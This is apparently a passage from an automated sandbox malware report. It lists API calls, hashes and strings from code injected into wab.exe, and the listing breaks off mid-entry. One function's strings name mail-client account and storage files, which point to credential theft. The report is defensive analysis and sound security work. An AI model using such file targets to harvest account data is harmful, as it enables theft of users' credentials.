                                          • _ValidateLocalCookies.LIBCMT ref: 22B2339B
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 22B233A3
                                          • _ValidateLocalCookies.LIBCMT ref: 22B23431
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 22B2345C
                                          • _ValidateLocalCookies.LIBCMT ref: 22B234B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 664312ecb8712924659b06d3763158fe6ec283daeb76120891d738af50f48e4c
                                          • Instruction ID: 92d087a593bcf69f38485e0ccaac7dbd5b68afaa952a629a247e63ea34d37ddb
                                          • Opcode Fuzzy Hash: 664312ecb8712924659b06d3763158fe6ec283daeb76120891d738af50f48e4c
                                          • Instruction Fuzzy Hash: 6041B234E007499BCF01CF68C984A9EBBB5EF49328F148396E92D9F261D735DA05CB91
                                          Function 22B2925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 22B29221: _free.LIBCMT ref: 22B2924A
                                          • _free.LIBCMT ref: 22B292AB
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          • _free.LIBCMT ref: 22B292B6
                                          • _free.LIBCMT ref: 22B292C1
                                          • _free.LIBCMT ref: 22B29315
                                          • _free.LIBCMT ref: 22B29320
                                          • _free.LIBCMT ref: 22B2932B
                                          • _free.LIBCMT ref: 22B29336
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 026839ccbc00445129a504a0200aef8c2cd015657932c49851fd76086813fad4
                                          • Instruction ID: 64b032497846d4e9aa6d7fe1a1fd18e7c7e8dc9db0ed995b0e8284289e4be564
                                          • Opcode Fuzzy Hash: 026839ccbc00445129a504a0200aef8c2cd015657932c49851fd76086813fad4
                                          • Instruction Fuzzy Hash: 95118E31980F18FADB30EBB0DC55FCB7B9DAF1C700F404A24A6DDB60A2DA64B5048751
                                          Function 22B28821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22B26FFD,00000000,?,?,?,22B28A72,?,?,00000100), ref: 22B2887B
                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,22B28A72,?,?,00000100,5EFC4D8B,?,?), ref: 22B28901
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 22B289FB
                                          • __freea.LIBCMT ref: 22B28A08
                                            • Part of subcall function 22B256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22B25702
                                          • __freea.LIBCMT ref: 22B28A11
                                          • __freea.LIBCMT ref: 22B28A36
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                          • String ID:
                                          • API String ID: 1414292761-0
                                          • Opcode ID: 77a50273c3f7b6a63b231a547f14644f489c94a4ef082a4890a2aa9edac61a87
                                          • Instruction ID: b54a4ef3ff370296953d33d0cd9f53b76be9e712b4ffa39b3c058cfea10fde00
                                          • Opcode Fuzzy Hash: 77a50273c3f7b6a63b231a547f14644f489c94a4ef082a4890a2aa9edac61a87
                                          • Instruction Fuzzy Hash: C651DF72610B16ABEF15CE60CD40FAB37AAEB45754F514729FE1CEA150EB34EC50C6A0
                                          Function 22B215DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _strlen.LIBCMT ref: 22B21607
                                          • _strcat.LIBCMT ref: 22B2161D
                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,22B2190E,?,?,00000000,?,00000000), ref: 22B21643
                                          • lstrcatW.KERNEL32(?,?), ref: 22B2165A
                                          • lstrlenW.KERNEL32(?,?,?,?,?,22B2190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22B21661
                                          • lstrcatW.KERNEL32(00001008,?), ref: 22B21686
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                          • String ID:
                                          • API String ID: 1922816806-0
                                          • Opcode ID: a9da317746dc68c714da88bd430780eca084b26e180bde70ccbae4340bff6934
                                          • Instruction ID: c1b21d7b96e259e561e6f7566d9f316af9dc1eddaac60960f46a3875d12dbf15
                                          • Opcode Fuzzy Hash: a9da317746dc68c714da88bd430780eca084b26e180bde70ccbae4340bff6934
                                          • Instruction Fuzzy Hash: CE21C836900704ABDB05DF94DC80EEE77B8EF8C710F24451BE908AB155DF74A54187A5
                                          Function 22B21000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcatW.KERNEL32(?,?), ref: 22B21038
                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22B2104B
                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22B21061
                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22B21075
                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22B21090
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 22B210B8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrlen$AttributesFilelstrcat
                                          • String ID:
                                          • API String ID: 3594823470-0
                                          • Opcode ID: fb69c13a7ea29a0b968c9602899eec29869d5bb24d79b294bdf87e3ad8fb3f22
                                          • Instruction ID: 6d35b4b74d1ca5af77a80f41d73ef556e8834d8f6f4fd214085d30fda030259c
                                          • Opcode Fuzzy Hash: fb69c13a7ea29a0b968c9602899eec29869d5bb24d79b294bdf87e3ad8fb3f22
                                          • Instruction Fuzzy Hash: D021A1359107199BCF20DFA0DD58EDB3768EF88324F104796E959A31B2DA319A86CB40
                                          Function 22B23856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,22B23518,22B223F1,22B21F17), ref: 22B23864
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22B23872
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 22B2388B
                                          • SetLastError.KERNEL32(00000000,?,22B23518,22B223F1,22B21F17), ref: 22B238DD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 1e5ad51895a237f26d4324228364d503d345d6e827b2169cd55b05ae8920d959
                                          • Instruction ID: 66b0cf10a3415e4985c8ca409090863240402f438c26540a3d5d1882c633d548
                                          • Opcode Fuzzy Hash: 1e5ad51895a237f26d4324228364d503d345d6e827b2169cd55b05ae8920d959
                                          • Instruction Fuzzy Hash: E6014C33A08F115EF20599796DC8B4B2794DF597B4B20033AF918DE0F5EF2958018350
                                          Function 22B25AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,22B26C6C), ref: 22B25AFA
                                          • _free.LIBCMT ref: 22B25B2D
                                          • _free.LIBCMT ref: 22B25B55
                                          • SetLastError.KERNEL32(00000000,?,?,22B26C6C), ref: 22B25B62
                                          • SetLastError.KERNEL32(00000000,?,?,22B26C6C), ref: 22B25B6E
                                          • _abort.LIBCMT ref: 22B25B74
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: 5713554d2cb5961859f3e904d18d532025c6c34ace37b32a4e712e23ef1a9c1d
                                          • Instruction ID: ce3aaa15ac8c755392739f313e7b6601a8b1ac1b8a15ee712c438e19fcea6948
                                          • Opcode Fuzzy Hash: 5713554d2cb5961859f3e904d18d532025c6c34ace37b32a4e712e23ef1a9c1d
                                          • Instruction Fuzzy Hash: 3CF0F971584F0167D20EEA345D6CF0F2629CFD96B1F110315FD1CA71A4EE2888024364
                                          Function 22B211EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 22B21E89: lstrlenW.KERNEL32(?,?,?,?,?,22B210DF,?,?,?,00000000), ref: 22B21E9A
                                            • Part of subcall function 22B21E89: lstrcatW.KERNEL32(?,?), ref: 22B21EAC
                                            • Part of subcall function 22B21E89: lstrlenW.KERNEL32(?,?,22B210DF,?,?,?,00000000), ref: 22B21EB3
                                            • Part of subcall function 22B21E89: lstrlenW.KERNEL32(?,?,22B210DF,?,?,?,00000000), ref: 22B21EC8
                                            • Part of subcall function 22B21E89: lstrcatW.KERNEL32(?,22B210DF), ref: 22B21ED3
                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 22B2122A
                                            • Part of subcall function 22B2173A: _strlen.LIBCMT ref: 22B21855
                                            • Part of subcall function 22B2173A: _strlen.LIBCMT ref: 22B21869
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                          • API String ID: 4036392271-1520055953
                                          • Opcode ID: 7a0c1786c7bab5841dc5b5d82d2b02f644ccfaa5c25deef202683771162f700c
                                          • Instruction ID: dcfec023b343a6ca9315efcf738941d1aaed2fb8e76a03c9d7b103f192923610
                                          • Opcode Fuzzy Hash: 7a0c1786c7bab5841dc5b5d82d2b02f644ccfaa5c25deef202683771162f700c
                                          • Instruction Fuzzy Hash: 4321C379E207086AEB10D7A4EC81FEE7339EF94714F000646F608EB1F1EAB11D818759
                                          Function 22B24B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22B24AEA,?,?,22B24A8A,?,22B32238,0000000C,22B24BBD,00000000,00000000), ref: 22B24B59
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22B24B6C
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,22B24AEA,?,?,22B24A8A,?,22B32238,0000000C,22B24BBD,00000000,00000000,?,22B22082), ref: 22B24B8F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 86d5c2aee0bf31d192b68a8d48146ffd1438467590aa18cb69fdb0ba5f964e29
                                          • Instruction ID: 9b0d20aacbdf0da8b516d724becb26185dcd68c4bfd66c98ce2a291638f5a3ce
                                          • Opcode Fuzzy Hash: 86d5c2aee0bf31d192b68a8d48146ffd1438467590aa18cb69fdb0ba5f964e29
                                          • Instruction Fuzzy Hash: 34F08C35A40719ABDB019BA0C81CF9EBFB9EF08291F010665FD09A7164DB348941CA90
                                          Function 22B27153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 22B2715C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 22B2717F
                                            • Part of subcall function 22B256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22B25702
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 22B271A5
                                          • _free.LIBCMT ref: 22B271B8
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 22B271C7
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: 402f93d5d4c962af505e9f2c7f3cc532b679d33f847c3d51dbc253e2ee34dfe9
                                          • Instruction ID: 7d3e1edae3de24a20fa715fba3acefac5204334a68186b5a68cc68cc2eaddaf6
                                          • Opcode Fuzzy Hash: 402f93d5d4c962af505e9f2c7f3cc532b679d33f847c3d51dbc253e2ee34dfe9
                                          • Instruction Fuzzy Hash: 7C01B572602B257B23118AB74C4CCBB2A6DDFC6EA5711032EBD08C721CDA648C0291B9
                                          Function 22B25B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000000,22B2636D,22B25713,00000000,?,22B22249,?,?,22B21D66,00000000,?,?,00000000), ref: 22B25B7F
                                          • _free.LIBCMT ref: 22B25BB4
                                          • _free.LIBCMT ref: 22B25BDB
                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B25BE8
                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B25BF1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: 7cf7c2c152dc45e41f0ca32a6e4bf29980f26e042fb8055e0a6e68fa44e9b9b1
                                          • Instruction ID: 5a1c13660bca43f82ea05d58dc67dce2ba008aaf74086949898dec0ea0fd1de4
                                          • Opcode Fuzzy Hash: 7cf7c2c152dc45e41f0ca32a6e4bf29980f26e042fb8055e0a6e68fa44e9b9b1
                                          • Instruction Fuzzy Hash: 8901F4B2184F01ABA20AEE741DBCE1F2A69DFD96B07110325FD1DA7165EE7889028364
                                          Function 22B21E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,?,22B210DF,?,?,?,00000000), ref: 22B21E9A
                                          • lstrcatW.KERNEL32(?,?), ref: 22B21EAC
                                          • lstrlenW.KERNEL32(?,?,22B210DF,?,?,?,00000000), ref: 22B21EB3
                                          • lstrlenW.KERNEL32(?,?,22B210DF,?,?,?,00000000), ref: 22B21EC8
                                          • lstrcatW.KERNEL32(?,22B210DF), ref: 22B21ED3
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrlen$lstrcat
                                          • String ID:
                                          • API String ID: 493641738-0
                                          • Opcode ID: 6ca44f681297324bf3266a8fc5fbc2c62ff1b25d01b5df42275e70d346d8f00e
                                          • Instruction ID: ecc7c6ce41cea6d437a4938b3266e07badcdd0e684a97bafc14f4198f1b5e197
                                          • Opcode Fuzzy Hash: 6ca44f681297324bf3266a8fc5fbc2c62ff1b25d01b5df42275e70d346d8f00e
                                          • Instruction Fuzzy Hash: 53F027361403107AD721776AAC95EBF7B7CEFCAB71F10051AFA0C831A0DB98584283B5
                                          Function 22B291B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 22B291D0
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          • _free.LIBCMT ref: 22B291E2
                                          • _free.LIBCMT ref: 22B291F4
                                          • _free.LIBCMT ref: 22B29206
                                          • _free.LIBCMT ref: 22B29218
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 3a316d5ec7adc1a12b282cc38931f89ed5460c5fa3b8613a4e423e9be5a7c532
                                          • Instruction ID: 3ac900a06dc15419648382e3dfb317036aefa06eea81517c35f4cf4e10cab632
                                          • Opcode Fuzzy Hash: 3a316d5ec7adc1a12b282cc38931f89ed5460c5fa3b8613a4e423e9be5a7c532
                                          • Instruction Fuzzy Hash: 28F0A971584F40EB8634CE59E6C4C0A7BE9EF683683200E05E94CCB420CA78F8808AA0
                                          Function 22B25351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 22B2536F
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          • _free.LIBCMT ref: 22B25381
                                          • _free.LIBCMT ref: 22B25394
                                          • _free.LIBCMT ref: 22B253A5
                                          • _free.LIBCMT ref: 22B253B6
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 03b240afe9ef49f847da4c09f3cc6cc50a0af229b4ec4ca9f93b00942be3f7ee
                                          • Instruction ID: 0e3ac03b90be66fbdb0d655ef4183393288f1d0d88e28bcfb5d5da8c40a24494
                                          • Opcode Fuzzy Hash: 03b240afe9ef49f847da4c09f3cc6cc50a0af229b4ec4ca9f93b00942be3f7ee
                                          • Instruction Fuzzy Hash: EFF030758D5F10DB86199F24959044E3FB5FF68BD03418A06FC159B269DBBD44419BC0
                                          Function 22B24BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 22B24C1D
                                          • _free.LIBCMT ref: 22B24CE8
                                          • _free.LIBCMT ref: 22B24CF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                          • API String ID: 2506810119-3377118234
                                          • Opcode ID: 40de1f5907a200c87c2960366d42fdf8f673a521f8e034a4d270c0e0682c4ecc
                                          • Instruction ID: eebc002abfeea1c1e124140000fa3d9182a04816c4fa64e1cecb4ac6525e66ca
                                          • Opcode Fuzzy Hash: 40de1f5907a200c87c2960366d42fdf8f673a521f8e034a4d270c0e0682c4ecc
                                          • Instruction Fuzzy Hash: 55319371A44B58EFDB11CFA9C980D9FBBFCEF98350F104266E9089B610D6748E41CBA0
                                          Function 22B286E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22B26FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 22B28731
                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 22B287BA
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 22B287CC
                                          • __freea.LIBCMT ref: 22B287D5
                                            • Part of subcall function 22B256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22B25702
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                          • String ID:
                                          • API String ID: 2652629310-0
                                          • Opcode ID: 712f0808bf2439c17a65cda08e41286e982e45793ae3c875bdc3261d160ef4f8
                                          • Instruction ID: fb4782ecb7cf8787cb47c1dc6bf5b3c413006d91b5346b61c753364f6dc30ee5
                                          • Opcode Fuzzy Hash: 712f0808bf2439c17a65cda08e41286e982e45793ae3c875bdc3261d160ef4f8
                                          • Instruction Fuzzy Hash: CD319C72A0171AABDF19CF64CC80EAF7BA6EF44314F414268ED08DB160E735D951CBA0
                                          Function 22B2C7E6 Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(22B2C7DD), ref: 22B2C7E6
                                          • GetModuleHandleA.KERNEL32(?,22B2C7DD), ref: 22B2C838
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 22B2C860
                                            • Part of subcall function 22B2C803: GetProcAddress.KERNEL32(00000000,22B2C7F4), ref: 22B2C804
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID:
                                          • API String ID: 1646373207-0
                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction ID: 6d208173700acbdf08730142f3f81a8d054886b28f5e9160da37a13272599410
                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction Fuzzy Hash: B9014900545F8039A710D6740C00EBA5FD8DB2B767B23DB56E20CCF1A3D950A505C3F6
                                          Function 22B25CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22B21D66,00000000,00000000,?,22B25C88,22B21D66,00000000,00000000,00000000,?,22B25E85,00000006,FlsSetValue), ref: 22B25D13
